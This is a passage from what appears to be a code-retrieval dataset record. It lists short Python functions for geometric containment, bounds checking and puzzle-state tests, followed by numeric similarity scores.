<= self.top_y", "def tnuc_region_in_intron(np, beg, end):\n\n if beg.tpos == 0 or end.tpos == 0: return False\n if beg.pos == end.pos and beg.tpos*end.tpos > 0:\n return True\n if beg.pos+1 == end.pos and beg.tpos>0 and end.tpos<0:\n return True\n if end.pos+1 == beg.pos and beg.tpos<0 and end.tpos>0:\n return True\n\n return False", "def square_boundaries(px , py, pz, incx, incy, incz, min_x, min_y, min_z, max_x, max_y, max_z):\n\n if px < min_x or px > max_x: \n pcx = px - incx \n\n if py < min_y or py > max_y:\n pcy = py - incy \n\n if pz < min_z or pz > max_z:\n pcz = pz - incz \n\n return pcx, pcy, pcz", "def onSegment(self, p, q, r):\n if ((q.x <= max(p.x, r.x)) and (q.x >= min(p.x, r.x)) and\n (q.y <= max(p.y, r.y)) and (q.y >= min(p.y, r.y))):\n return True\n return False", "def checkvalid(self,borad,row,col,n):\n # check the above column has 'Q'\n i=0\n while i!=row:\n if borad[i][col]=='Q':\n return False\n i+=1\n # check the left-top 135 and right-top 45\n i,j=row-1,col-1\n while i>=0 and j>=0:\n if borad[i][j]=='Q':\n return False\n i-=1\n j-=1\n \n i,j=row-1,col+1\n while i>=0 and j<n:\n if borad[i][j]=='Q':\n return False\n i-=1\n j+=1\n \n return True", "def right_of(self,v):\n x,y = v[0:2]\n if y < self.ylo: return False\n if y >= self.yhi: return False\n if x > self.xhi: return False\n if x > ((y * self.m) + self.b): return False\n return True", "def between(self, p: PointType, q: PointType) -> bool:\n\n i = min(p.x, q.x) <= self.x <= max(p.x, q.x)\n j = min(p.y, q.y) <= self.y <= max(p.y, q.y)\n\n return i and j", "def in_range(x, y):\n if (x < 0 or x > width or y < 0 or y > length):\n return False\n else:\n return True", "def validar_triangulo(a,b,c):\n if (a+b) > c and a+c > b:\n print('Es un triangulo')\n else:\n print('No es un triangulo')", "def _point_in_tris(self, pos, obj):\n these_tris = obj._tris['fill'].reshape(-1, 3)\n for tri in these_tris:\n if self._point_in_tri(pos, obj._points['fill'][tri]):\n return True\n return False", "def four_qs(self, xp, yp, c, val1, val2):\r\n xs, ys = c\r\n x = xs-xp\r\n y = 
ys-yp\r\n if (x == 0 and y >= 0) or (y==0 and x > 0):\r\n return val2\r\n elif x == 0 and y<0 or (y==0 and x <= 0):\r\n return val1\r\n else:\r\n pass\r\n phi = np.arctan(y/x)\r\n expr = (0 <= phi <= 0.5*np.pi) or (np.pi < phi < 1.5*np.pi)\r\n if expr: # pixel is in first or third quadrant\r\n return val2\r\n else: # pixel is in second or fourth quadrant\r\n return val1", "def valid_coordinates(self, x, y):\n return ((x >= 0) and (x < self.width) and\n (y >= 0) and (y < self.height))", "def isSquare(self, sides, player_positions):\n\t\tprint \"Inside isSquare!-----\"\n\t\tequalSide1 = -1\n\t\tequalSide2 = -1\n\t\tunequalSide = -1\n\t\tif(sides[0] == sides[1]):\n\t\t\tif(sides[0] != sides[2]):\n\t\t\t\tequalSide1 = 0\n\t\t\t\tequalSide2 = 1\n\t\t\t\tunequalSide = 2\n\t\telif(sides[1] == sides[2]):\n\t\t\tif(sides[1] != sides[0]):\n\t\t\t\tequalSide1 = 1\n\t\t\t\tequalSide2 = 2\n\t\t\t\tunequalSide = 0 \n\t\telif(sides[0] == sides[2]):\n\t\t\tif(sides[0] != sides[1]):\n\t\t\t\tequalSide1 = 0\n\t\t\t\tequalSide2 = 2\n\t\t\t\tunequalSide = 1\n\n\t\t\"\"\"\n\t\t\tIf failed to satisfy the above condition, the points doesn't form a square\n \t\tOtherwise check for the square distance conditions\n \t\"\"\"\n\t\tif(equalSide1 != -1):\n\t\t\topposing = 0\n\t\t\tif(unequalSide == 0):\n\t\t\t\topposing = self.distance(player_positions[2], player_positions[3]);\n\t\t\telif(unequalSide == 1):\n\t\t\t\topposing = self.distance(player_positions[1], player_positions[3]);\n\t\t\telif(unequalSide == 2):\n\t\t\t\topposing = self.distance(player_positions[1], player_positions[2]);\n\n\t\t\tif(opposing == sides[unequalSide]):\n\t\t\t\tdiagonal = opposing\n\t\t\t\tadjacent = sides[equalSide1]\n\t\t\t\tis_Square = True\n\t\t\t\tfor a in range(0,4):\n\t\t\t\t\tdiagonalCount = 0\n\t\t\t\t\tadjacentCount = 0 \n\t\t\t\t\tfor b in range(0,4):\n\t\t\t\t\t\tif(a != b):\n\t\t\t\t\t\t\tdistance1 = self.distance(player_positions[a], player_positions[b]);\n\t\t\t\t\t\t\tif(distance1 == diagonal):\n\t\t\t\t\t\t\t\tdiagonalCount += 1\n\t\t\t\t\t\t\telif(distance1 == adjacent):\n\t\t\t\t\t\t\t\tadjacentCount += 1\n\t\n\t\t\t\t\tif((diagonalCount == 1 and adjacentCount == 2) != True): #If there is one diagonal and two adjacents\n\t\t\t\t\t\tis_Square = False\n\t\t\t\t\t\tbreak;\n\t\t\t\tif(is_Square == True): #There is a square\n\t\t\t\t\treturn True\n\t\treturn False", "def p_in_tri(p, tri):\n tri = np.array(tri)\n\n x = p[0]\n y = p[1]\n\n x1 = tri[0, 0]\n y1 = tri[0, 1]\n\n x2 = tri[1, 0]\n y2 = tri[1, 1]\n\n x3 = tri[2, 0]\n y3 = tri[2, 1]\n\n a = ((y2 - y3) * (x - x3) + (x3 - x2) * (y - y3)) / ((y2 - y3) * (x1 - x3) + (x3 - x2) * (y1 - y3))\n b = ((y3 - y1) * (x - x3) + (x1 - x3) * (y - y3)) / ((y2 - y3) * (x1 - x3) + (x3 - x2) * (y1 - y3))\n c = 1 - a - b\n\n return (0 <= a <= 1) and (0 <= b <= 1) and (0 <= c <= 1)", "def is_solved(self):\n return self.from_grid == self.to_grid", "def is_solved(self):\n return self.from_grid == self.to_grid", "def is_solved(self):\n return self.from_grid == self.to_grid", "def is_valid_number(self):\n for condition in [self.game.getRow(self.pos), self.game.getCol(self.pos), self.game.getSquare(self.pos)]:\n if not self.check_alignement_condition(condition):\n return False\n return True", "def is_solved(self):\n return self.to_grid == self.from_grid", "def __ge__(self, other):\n return self.x ** 2 + self.y ** 2 >= other.x ** 2 + other.y ** 2", "def is_inside(self, x: int, y: int) -> bool:\n pass", "def is_at_intersection(self):\n directions = 0\n self.tile = (self.get_nearest_row(), 
self.get_nearest_col())\n if self.internal_map[self.tile[0] - 1][self.tile[1]] not in ('x', ):\n directions += 1\n if self.internal_map[self.tile[0] + 1][self.tile[1]] not in ('x', ):\n directions += 1\n if self.internal_map[self.tile[0]][self.tile[1] - 1] not in ('x', ):\n directions += 1\n if self.internal_map[self.tile[0]][self.tile[1] + 1] not in ('x', ):\n directions += 1\n return True if directions > 2 else False", "def Q8_test():\n dispo = [False, True, True, False]\n tab_dist = [[0, 4.123105625617661, 4.242640687119285, 4.47213595499958], [4.123105625617661, 0, 4.123105625617661, 7.810249675906654], [4.242640687119285, 4.123105625617661, 0, 5.0990195135927845], [4.47213595499958, 7.810249675906654, 5.0990195135927845, 0]]\n return 1 == indice(0, tab_dist, dispo)", "def exsist_triangle(a: int, b: int, c: int):\n if a + b > c and a + c > b and b + c > a:\n print('Триугольник существует')\n if a == b == c:\n print('Триугольник равносторонний')\n elif a == b or a == c or b == c:\n print('Триугольник равнобедренный')\n else:\n print('Триугольник разносторонний')\n else:\n print('Триугольник не существует')", "def is_solved(self):\n return (self.from_grid == self.to_grid)", "def is_valid(row, peg):\n return (\n (row < TRI_SIZE) and\n (row >= 0) and\n (peg < TRI_SIZE) and\n (peg >= 0) and\n (peg <= row)\n )", "def is_curr_location_corner(game, player_location):\n corner_positions = [(0, 0), (0, game.height - 1), (game.width - 1, 0), (game.width - 1, game.height - 1)]\n return player_location in corner_positions", "def is_tri(n):\n tri_test = (-1 + sqrt(1 + 8*n))/2\n if tri_test == int(tri_test):\n return True\n return False", "def check_coordinates(X, Y):\n\n # Accounting for elliptical Jupiter disk\n Y *= 1.071374\n\n return sqrt(X ** 2 + Y ** 2)", "def is_cross(self, row, col):\n return self.field[row, col] == 'O'", "def tooTight(self, row, col, i, j):\n return self.distanceToGoal[row + i][col] == self.infinity or \\\n self.distanceToGoal[row][col + j] == self.infinity", "def colisiona(self, r, p):\n # Esta en el eje de las x?\n if p[0] >= r[0] and p[0] <= r[0] + 10:\n # Esta en el eje de las y?\n if p[1] >= r[1] and p[1] <= r[1] + 5:\n return True\n else:\n return False\n else:\n return False", "def is_ccw(a, b, c):\n p = b - a\n q = c - a\n area = p.x * q.y - q.x * p.y\n\t # May want to throw an exception if area == 0\n return area > 0", "def within(p, q, r):\r\n return p <= q <= r or r <= q <= p", "def contains(self, point):\n return 0 <= point.x <= 1 \\\n and 0 <= point.y <= 1 \\\n and 0 <= point.z <= 1", "def inside(i,j,im,h=H): #X\n return i-h >=0 and j-h >=0 and i+h+1<=im.shape[0] and j+h+1<=im.shape[1]", "def checkpsq(i):\n min=int(math.floor(math.sqrt(i)))\n max=int(math.ceil(math.sqrt(i)))\n if(i==min*min or i==max*max):\n return True", "def inRect(p,rect,dilation):\n if p[0]<rect[0]-dilation: return 0\n if p[1]<rect[1]-dilation: return 0\n if p[0]>rect[2]+dilation: return 0\n if p[1]>rect[3]+dilation: return 0\n return 1", "def test_sms_case_1(self):\n pt = (-31.459823375717541, 29.927133417260336, 0)\n\n pts = ((-20.150000000000002, 46.579999999999998, 7),\n (-41.100000000000001, 30.370000000000001, 8),\n (-19.550000000000001, 29.379999999999999, 9))\n tris = (2, 0, 1)\n\n tri_search = grid.geometry.TriSearch(pts, tris)\n\n self.assertEqual(0, tri_search.triangle_containing_point(pt))", "def box_valid(self):\n return ((self.lt.x >= 0)\n and (self.lt.y >= 0)\n and (self.rb.x >= self.lt.x)\n and (self.rb.y >= self.lt.y))", "def curvature_sanity(left_curvature, left_offset, 
right_curvature, right_offset):\n if return_queue_len(flag='L') >= 1 and return_queue_len(flag='R') >= 1:\n offset = center_position - (left_offset + right_offset) / 2.\n offset_measure = np.abs(overall_offset - offset)\n return True if offset_measure < 0.2 else False\n else:\n return True", "def testTriangleInequality(self):\n for profile1 in self.profiles:\n for profile2 in self.profiles:\n for profile3 in self.profiles:\n self.assertTrue(profile1.edit_distance(profile3) <= profile1.edit_distance(profile2) + profile2.edit_distance(profile3))", "def ispolygonXY(a):\n return ispolygon(a) and isXYPlanar(a)", "def check_2x2_solved(self):\n return self._grid[0][0] == 0 and self._grid[0][1] == 1 \\\n and self._grid[1][0] == self._width*1 and self._grid[1][1] == (1 + self._width * 1)", "def contains ( self, pos ):\n dr2 = (pos[0, :]-self.x)**2 + (pos[1, :]-self.y)**2\n # which points are in the circle?\n if self.include_border:\n inds = (dr2 - self.r**2) < self.abs_tol\n else:\n inds = (dr2 - self.r**2) < -self.abs_tol\n \n \n # if there's no poit inside\n if ~inds.any() and self.default_nearest: \n inds[argmin(dr2)] = True\n \n return inds", "def check_position(self, player):\n\n # Mid point of the segment defining the goal\n mid = Point.mid_point(self.s_pos, self.e_pos)\n\n # Transposition of this point by the direction vector of the goal\n # to get the direction vector with its origin in the center of the goal\n mid_prime = self.dir + mid\n\n # Creating both needed vectors\n v1 = Vector.v_from_pp(mid, player.pos)\n v2 = Vector.v_from_pp(mid, mid_prime)\n\n # Getting the angle and checking if it is a valid one\n angle = v1.angle(v2)\n\n return self.is_in_interval(-math.pi / 2, math.pi / 2, angle)", "def contains_point(self, x, y): \r\n n = len(self.points)\r\n inside = False\r\n \r\n x1, y1 = self.points[0]\r\n for i in range(n + 1):\r\n x2, y2 = self.points[i % n]\r\n if y > min(y1, y2):\r\n if y <= max(y1, y2):\r\n if x <= max(x1, x2):\r\n if y1 != y2:\r\n xinters = (y - y1) * (x2 - x1) / (y2 - y1) + x1\r\n if x1 == x2 or x <= xinters:\r\n inside = not inside\r\n x1, y1 = x2, y2\r\n \r\n return inside" ]
[ "0.7044399", "0.68214154", "0.67046845", "0.668237", "0.65902036", "0.6427196", "0.6391145", "0.637763", "0.6324196", "0.6229131", "0.6208887", "0.62083405", "0.61662257", "0.6166056", "0.61422956", "0.6140599", "0.6139746", "0.61388415", "0.6134873", "0.61307234", "0.611599", "0.6103065", "0.60957086", "0.6092551", "0.6088955", "0.6085997", "0.6073432", "0.60492045", "0.60358596", "0.60215306", "0.60074556", "0.60037297", "0.599743", "0.59950894", "0.599435", "0.59704083", "0.5957802", "0.5953584", "0.5953189", "0.5951961", "0.5939069", "0.5939069", "0.59389865", "0.5928242", "0.59156066", "0.59146726", "0.5912249", "0.59094286", "0.5909373", "0.590881", "0.5906373", "0.58972895", "0.5888805", "0.58746636", "0.58705425", "0.58683854", "0.5853479", "0.5845383", "0.5840414", "0.583487", "0.5831233", "0.58303857", "0.5825905", "0.58232296", "0.5822634", "0.5816353", "0.581559", "0.5811251", "0.5807074", "0.5807074", "0.5807074", "0.5796954", "0.5796285", "0.57938915", "0.5788318", "0.5787857", "0.5786951", "0.5784918", "0.5784551", "0.57803893", "0.5769122", "0.5765927", "0.57519865", "0.57516533", "0.57495177", "0.57495105", "0.574914", "0.5746351", "0.574369", "0.57397425", "0.573819", "0.5734801", "0.57323176", "0.57275426", "0.57193303", "0.5717399", "0.57160336", "0.5715342", "0.5713003", "0.5707195", "0.5706487" ]
0.0
-1
Last n digits of the number num
def last_n_digits(num, n):
    return num % (10**n)
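# Illustrative usage: num % 10**n keeps the n low-order decimal digits.
# last_n_digits(123456, 3)  # 456
# Caveat: Python's % is non-negative for a positive modulus, so
# last_n_digits(-123456, 3) returns 544; negative inputs need extra care.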
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def digit(number: int, n: int) -> int:\n return number // 10 ** n % 10", "def getNumber():", "def residuo_cero(numero):\n for x in range (1,10):\n if(numero % x == 0):\n return x \n return numero", "def CLng(num):\n return int(round(float(num)))", "def digito_verificacao(n):\n \n # Para obtermos o digito de verificacao, comecamos por somar todos os digitos do cartao, com excecao do de controle. Caso o resto da soma por 10 seja diferente de 0, o digito sera a diferenca entre 10 e esta. Caso seja 0, e este o digito de verificacao. \n\n soma = calc_soma(n)\n \n dig_ver = 0 \n \n if soma%10 != 0:\n dig_ver = 10 - soma%10\n \n \n return str(dig_ver)", "def cut_number(n):\n i = 0\n while True:\n cur = n % 10\n ahead = n // 10 % 10\n if cur > ahead:\n i += 1\n break\n i += 1\n n //= 10\n return i", "def get_n_digit(num):\n cnt = 0\n while num & 1 != 1:\n num >>= 1\n cnt += 1\n # print(cnt)\n return cnt", "def last_digit(n):\n\n return n % 10", "def numerize():\n pass", "def get_dig_num(num, n = 1):\n digit = num//10**n%10 # this is the n-th digit, 0-indexed\n return digit", "def fn(n):\n digits = [int(x) for x in str(n)]\n for i in reversed(range(len(digits)//2+1)): \n if digits[i] < 9: break \n else: return 10*n + 11\n digits[i] = digits[~i] = digits[i] + 1\n for ii in range(i): \n digits[~ii] = digits[ii]\n for ii in range(i+1, len(digits)//2+1): \n digits[ii] = digits[~ii] = 0\n return int(\"\".join(map(str, digits)))", "def returnOnceDigit(no):\n \n div = 1\n for i in range(1,len(str(no))):\n div = div * 10\n no = int(no)\n while(not no < 10):\n no = no % div\n div = div/10\n return int(no)", "def get_t(self, n, c):\n t = 1\n while t * n + t * t * n * n < 2 * c:\n t += 1\n return t - 1", "def transforme(n):\n if n<10 :\n return '0'+str(n)\n else :\n return str(n)", "def _to_int(self, num):\n assert isinstance(num, Number), 'Is not number in _to_int'\n return floor(self.__tick_to_unit_time * num)", "def n():\n # For documentation purposes", "def gera_num_cc(abv):\n \n # Ao recebermos a indicacao de que entidade se pretende gerar um numero, usamos a funcao auxiliar escolhe_iin_comp para escolher aleatoriamente os digitos iniciais e o comprimento do cartao.\n # O numero final comeca por ser os digitos iniciais, juntando a estes, do lado direito, numeros aleatorios ate chegarmos ao comprimento pretendido menos 1. 
O ultimo digito sera o digito de verificacao.\n \n dig_iniciais , comp = escolhe_iin_comp(abv) \n num_cc = dig_iniciais\n \n for i in range(comp-len(dig_iniciais)-1): \n num_cc = num_cc + str(int(random()*10)) \n \n num_cc = num_cc + digito_verificacao(num_cc)\n \n return int(num_cc)", "def countdown(n):\n while n > 0:\n n -= 1", "def int2dec(n: int) -> str:", "def nr():\n pass", "def time(n):\n steps = 3 + math.ceil(n/5.0)*2\n return steps", "def mirror(n):\n return (n % 10)*10 + (n // 10)", "def cuadrado(n):\n cuadrado=n**2\n print n, \"al cuadrado es\", cuadrado\n return cuadrado", "def lastTen(self, num, length):\n\t\tif (length-num <=10):\n\t\t\treturn 1\n\t\treturn 0", "def calc_rec_cycle(number):\n result = 0\n i = 10 ** (int(math.log10(number)) + 1)\n s = set()\n\n while True:\n if i == number or i == 0:\n result = 0\n break\n\n if i < number:\n result += 1\n i *= 10\n continue\n\n # i > n\n r = i % number\n #print('r',r)\n if r not in s:\n result += 1\n s.add(r)\n else:\n break\n\n i = r * 10\n return result", "def numero_a_letras(n):\n especiales = {0: 'cero', 10: 'diez', 11: 'once', 12: 'doce', 13: 'trece', 14: 'catorce', 15: 'quince', 20: 'veinte', 100: 'cien', 1000: 'mil'}\n if n in especiales:\n return especiales[n]\n if n < 100:\n cifras = ['', 'una', 'dos', 'tres', 'cuatro', 'cinco', 'seis', 'siete', 'ocho', 'nueve']\n decenas = ['', 'dieci', 'veinti', 'treinta', 'cuarenta', 'cincuenta', 'sesenta', 'setenta', 'ochenta', 'noventa']\n if n % 10 == 0:\n return decenas[n // 10]\n if n < 30:\n return f\"{decenas[n // 10]}{cifras[n % 10]}\"\n return f\"{decenas[n // 10]} y {cifras[n % 10]}\"\n elif n < 1000:\n centenas = ['', 'ciento', 'doscientas', 'trescientas', 'cuatrocientas', 'quinientas', 'seiscientas', 'setecientas', 'ochocientas', 'novecientas']\n if n % 100 == 0:\n return centenas[n // 100]\n return f\"{centenas[n // 100]} {numero_a_letras(n % 100)}\"\n elif n < 10**6:\n if n < 2000:\n return f\"mil {numero_a_letras(n % 1000)}\"\n if n % 1000 == 0:\n return f\"{numero_a_letras(n // 1000)} mil\"\n return f\"{numero_a_letras(n // 1000)} mil {numero_a_letras(n % 1000)}\"\n else:\n raise ValueError(\"Numero demasiado grande\")", "def zernike_num_coeff(n):\n \n\tif not (n>=0):\n\t\tprint('Input parameter must be >= 0')\n\t\traise AssertionError() \n \n\treturn sum(xrange(n+1)) + n+1", "def generate_n3(self):\r\n tot = 0\r\n str2 = self.time\r\n ss = float(str2.microsecond)\r\n n = ceil(ss * 100) / 1000.0\r\n while n > 0:\r\n dig = n % 10\r\n tot = tot+dig\r\n n = n//10\r\n self.n_3 = tot\r\n self.n_3decimal = int(abs(pi)*math.pow(10, self.n_3)) % 10", "def monotoneIncreasingDigits(self, N: int) -> int:\n digits = [int(e) for e in str(N)]\n pointer = len(digits)\n for i in range(len(digits) - 1, 0, -1):\n if digits[i - 1] > digits[i]:\n pointer = i\n digits[i - 1] -= 1\n\n for i in range(pointer, len(digits)):\n digits[i] = 9\n\n return int(\"\".join(map(str, digits)))", "def evaluate_number(number : int)->int:\n if type(number) == int and number >1 and number < 100:\n num = total_numbers = porc = 0\n while porc < number:\n num = num + 1\n clasificate = is_bouncy(str(num))\n result = evaluate(clasificate , num)\n if result:\n total_numbers = total_numbers + 1\n porc = total_numbers * 100 / num\n return num\n return 0", "def headbut_miss(num):\r\n\tglobal php\r\n\tif num == 0:\r\n\t\tphp -= 10\r\n\t\treturn 0\r\n\telse:\r\n\t\treturn num", "def _get_time(self, sec, nsec):\n return sec + nsec / (10**9)", "def compute(num):\n # 567 / 9 = 63, 235 / 47 = 5\n num = (num * 63 + 7492) 
* 5 - 498\n if num < 0: # modulus won't give correct result if number is negative\n num *= -1\n res = (num // 10) % 10\n return res", "def ndigits(n):\n return len(str(abs(n)))", "def litres(time):\n return int(time / 2)", "def next_integer(n):\n if n % 2 == 0:\n return n // 2\n else:\n return 3 * n + 1", "def _num(self):\n try:\n num = int(self.__rId[3:])\n except ValueError:\n num = 9999\n return num", "def __int__(self):\n return int(self.micros() // 1000000)", "def inc_num(num):\n return num + 1", "def get_tribonnaci(self, n):\n if n not in self.numbers:\n current_n = max(self.numbers)\n while current_n < n:\n current_n += 1\n self.numbers[current_n] = self.numbers[current_n - 1] + \\\n self.numbers[current_n - 2] + \\\n self.numbers[current_n - 3]\n return self.numbers[n]", "def valor_absoluto(numero):\r\n if numero >= 0:\r\n return numero\r\n else:\r\n return - numero", "def count_digit(x, i):\n \"\"\" GRAPSTE TON KWDIKA SAS APO KATW \"\"\"\n su = 0\n s = 0\n k = x\n while(i>1):\n x = x//10\n i = i-1\n s = x%10\n while(k>0):\n if((k%10)==s):\n su = su + 1\n k = k//10\n return su", "def cascade(n):\n print(n)\n if n >= 10:\n cascade(n//10)\n print(n)", "def get_seq_num():\n t = datetime.datetime.now()\n mt = time.mktime(t.timetuple())\n nextnum = int(mt)\n retval = nextnum % 10000000\n return retval", "def n(self):\n pass", "def reverse_digits(number: int):\n acc = 0\n\n while number != 0:\n acc *= 10\n acc += number % 10\n\n number //= 10 # 정수 나눗셈\n\n return acc", "def diviseur(n):\n s = 0\n for i in range (1, n):\n if n%i == 0:\n s += 1\n print(i)\n return \"Le nombre de diviseurs est\", s", "def thou(n):\n if pthou:\n return \"{:,d}\".format(n)\n return \"{:d}\".format(n)", "def first_n_digits(num, n):\n return num // 10 ** (int(math.log(num, 10)) - n + 1)", "def get_digit(n):\n \"\"\"\n 9 - 9\n 10-99 - 2*90 \n 100-999 - 3*900\n \"\"\"\n i = 0\n start = 0\n done = False\n while not done:\n step = (i+1)*9*(10**i)\n if start + step > n:\n done = True\n else:\n start += step\n i += 1\n\n num_digits = i + 1\n\n offset = n - start\n number = offset // num_digits + \\\n (10**(num_digits-1) if (num_digits - 1) else 0)\n _i = (offset - 1) % num_digits\n return int(str(number)[_i])", "def count_to10():\n numberx = 0\n while numberx < 10:\n numberx += 1\n print(numberx)", "def num_digits(num):\r\n if num == 0:\r\n return 1\r\n return int(log10(num)+1)", "def num(self):\n return self.num", "def firstTen(self, num):\n\t\tif num <= 10:\n\t\t\treturn 1 \n\t\treturn 0", "def get_period(n):\n remainder = 1\n i = 1\n cache = {}\n while True:\n remainder = (10 * remainder) % n\n if remainder in cache:\n return i - cache[remainder]\n\n cache.update({remainder: i})\n i += 1", "def convert_base(num, n):\r\n new_num_string = ''\r\n current = num\r\n while current != 0:\r\n remainder = current % n\r\n if remainder > 9:\r\n remainder_string = HEX_CHARS[remainder]\r\n elif remainder >= 36:\r\n remainder_string = '('+str(remainder)+')'\r\n else:\r\n remainder_string = str(remainder)\r\n new_num_string = remainder_string+new_num_string\r\n current = current//n\r\n return new_num_string", "def calc_soma(n):\n \n # Comecamos por percorrer os caracteres de n, e juntamos a cada caracter o que estava à sua direira, do lado esquerdo, invertendo o numero. Caso um dos caracteres nao seja um algarismo, chamamos a atencao ao utilizador para o erro.\n # Seguidamente, percorremos a cadeia recem criada. OS caracteres nas posicoes impares da cadeia anterior (indices 0,2,4,..) vao ser multiplicados por 2. 
Se a multiplicacao der um resultado superior a 9, subtrai-se 9. Os caracteres nas posicoes pares vao para a nova cadeia sem qualquer alteracao.\n # Finalmente percorremos os elementos da cadeia e somamos, convertidos a inteiros.\n \n \n comp = len(n)\n num_invertido , num_invertido2 = '' , ''\n soma_luhn = 0\n \n for e in n:\n \n if '0' <= e <= '9': \n num_invertido = e + num_invertido\n \n else:\n raise ValueError ('function calc_soma(): O string recebido apenas pode conter digitos')\n \n \n for i in range(comp):\n \n if i%2 == 0:\n resultado = eval(num_invertido[i]) * 2\n \n if resultado > 9:\n num_invertido2 = num_invertido2 + str(resultado - 9)\n \n else:\n num_invertido2 = num_invertido2 + str(resultado)\n \n else:\n num_invertido2 = num_invertido2 + (num_invertido[i])\n \n\n for e in num_invertido2:\n soma_luhn = soma_luhn + eval(e)\n \n return soma_luhn", "def lucas(n):\n \n A = 2\n B = 1\n Counter = 1\n C = 0 \n \n while Counter <= n:\n C = A + B\n A = B\n B = C\n Counter = Counter + 1\n if (Counter + 1) == n:\n return C", "def normexponent(val):\n n = np.log10(val)\n if n < 0:\n n = int(n) - 1\n else:\n n = int(n)\n return n", "def find_num(n: int) -> int:\n n = n - 54 * (n // 54)\n n = n - 6 * (n // 6)\n flat_nums = {1:1,\n 2:2,\n 3:3,\n 4:4,\n 5:5,\n 0:6}\n return(flat_nums[n%6])", "def next_num(cls):\r\n cls.num += 1\r\n return cls.num", "def sumn(n):\n return n * (n + 1) // 2", "def calc(self):\n num = 22\n while not self.divisible(num):\n # we know that only even numbers are divisible by 2, so\n # we only inspect even numbers.\n num = num + 2\n if num % 10000:\n print(str(num), end='\\r')\n\n return num", "def updateNumerosity(self, num):\n self.numerosity += num", "def nze(self) -> int:", "def nze(self) -> int:", "def record_digits(n):\n return record_digits_acc(str(n), 0, [0]*10)", "def micros() -> int:", "def karana(n):\n if n == 1:\n return 0\n elif n > 57:\n return n - 50\n else:\n return amod(n - 1, 7)", "def number(self):", "def RecCountup(n):\n if n == 0:\n return print('0')\n RecCountup(n - 1)\n print(n)", "def f(n):\n\tfor i in range(101, n):\n\t\tif (i % 21 == 0):\n\t\t\treturn i", "def numer(self, a):\n return a", "def number(self):\n return self._num", "def get_oglindit(numar):\n if numar < 0:\n return numar\n numar_str = str(numar)\n numar_str = numar_str[::-1]\n return int(numar_str)", "def print_last_digit(number):\n\n ld = abs(number) % 10\n print(ld, end=\"\")\n return ld", "def natural_numbers():\n \n acc=0\n for x in range(1000): \n if x%3==0 or x%5==0:\n acc=acc+x\n return acc", "def sumDigit():", "def generate_n1(self):\r\n obj = Random\r\n self.n_1 = int(int(obj.date_split[0])-2000)+int(obj.date_split[1])+int(obj.date_split[2])\r\n self.n_1decimal = int(abs(pi)*math.pow(10, self.n_1)) % 10", "def digit_sum(n):\n s = 0\n while n:\n s += n % 10\n n //= 10\n return s", "def acc_num_gen():\n try:\n max_agg = Dataset.objects.all().aggregate(models.Max('accession_number'))\n max_val = max_agg['accession_number__max']\n match = re.search('\\d+', max_val)\n int_val = int(max_val[match.span()[0]:match.span()[1]])\n except (TypeError, AttributeError):\n int_val = 0\n \n if int_val < 200:\n int_val = 200\n else:\n int_val += 1\n return \"ds%06d\" % (int_val)", "def nw(n):\n return 4*n*n + 1", "def cbrt(num):\r\n if not isinstance(num, dec.Decimal):\r\n num = dec.Decimal(num)\r\n if num == 0:\r\n return dec.Decimal(0)\r\n context = getcontext()\r\n context.prec += 2\r\n x = num / 3\r\n while True:\r\n p = x\r\n x = (2*x + num/x/x) / 3\r\n if p == x:\r\n 
context.prec -= 2\r\n return x", "def esprimo(numero):\n\tcontador = 2\n\t\n\tresultado = True\n\t\n\t#Loop principal. Corre hasta que el contador sea numero - 1.\n\twhile contador < numero:\n\t\t#Hace la division.\n\t\tresto = numero % contador\n\t\t\n\t\t#Mientras la division no sea 0, se salta esta parte completamente.\n\t\twhile resto == 0:\n\t\t\t#Si la division es 0, esto entrara en un loop infinito.\n\t\t\tresultado = False\n\t\t\t#por eso rompemos el loop con break\n\t\t\tbreak\n\t\t\n\t\tcontador += 1\n\treturn resultado", "def monotoneIncreasingDigits(N):\n sN = str(N)\n backn = 0\n res = []\n for i in range(len(sN)):\n if i == 0:\n res.append(sN[i])\n continue\n num = int(sN[i])\n lastn = int(sN[i-1])\n if num > lastn:\n res.append(sN[i])\n backn = 0\n elif num == lastn:\n res.append(sN[i])\n backn += 1\n else:\n if backn == 0:\n l = int(res.pop())\n res.append(str(l-1))\n else:\n for j in range(backn):\n res[i-j-1] = '9'\n res[i-backn-1] = str(int(res[i-backn-1])-1)\n for j in range(i, len(sN)):\n res.append('9')\n break\n res = int(''.join(res))\n return res", "def octagonal(n: int) -> int:\n return int(n * (3 * n - 2))", "def triangular_number(n):\n return n*(n+1) / 2", "def trailingZeroes(self, n):\n cnt = 0\n while n:\n n /= 5\n cnt += n\n\n return cnt", "def ltos(n):\r\n s = ''\r\n for x in (2**24, 2**16, 2**8):\r\n quot, rem = (n/x, n%x)\r\n s += chr(quot)\r\n n = rem\r\n s += chr(n % 256)\r\n return s", "def last_digits(x,y,n):\n\tr = modexp(x,y, 10**n)\n\n\t#post processing to make sure we didn't cut off a leading 0\n\treturn str(r).zfill(n)", "def random_num(self):\r\n self.generate_n1()\r\n self.generate_n2()\r\n self.generate_n3()\r\n self.generate_n4()\r\n random_number = str(self.n_1decimal)+str(self.n_2decimal)+str(self.n_3decimal)+str(self.n_4decimal)\r\n print int(random_number)", "def floor(n: float) -> int:\n return int(n // 1)", "def _irep_to_value(self,n,i):\n if i == 1:\n j,k = divmod(n,9)\n v = (k+1)*10**j\n return v\n else:\n j,k = divmod(n,int(10.0/i))\n if k == 0:\n v = 10**j\n else:\n v = i*k*10**j\n return v", "def _number_of_digits(number: int) -> int:\n return int(log10(number)) + 1", "def demo_a_number(random_number):", "def sum_digits(n):\n \"*** YOUR CODE HERE ***\"\n count=0\n length=len(str(n))\n last=0\n sum=0\n while count<length:\n last=n%10\n n//=10\n sum+=last\n count+=1\n return sum", "def lentero():\r\n\twhile True:\r\n\t\tn = raw_input(\"Ingrese el valor deseado: \")\r\n\t\ttry:\r\n\t\t\tn_1 = int(n)\r\n\t\t\treturn n_1\r\n\t\texcept ValueError:\r\n\t\t\tprint(\"POR FAVOR: Ingrese un valor numerico y entero\")", "def getN(self)->int:\n return self.n", "def I (self, n):", "def gen_num(lim=10000):\n n = 1\n yield 2\n yield 3\n while 6 * n + 1 <= lim:\n yield 6 * n - 1\n yield 6 * n + 1\n n += 1" ]
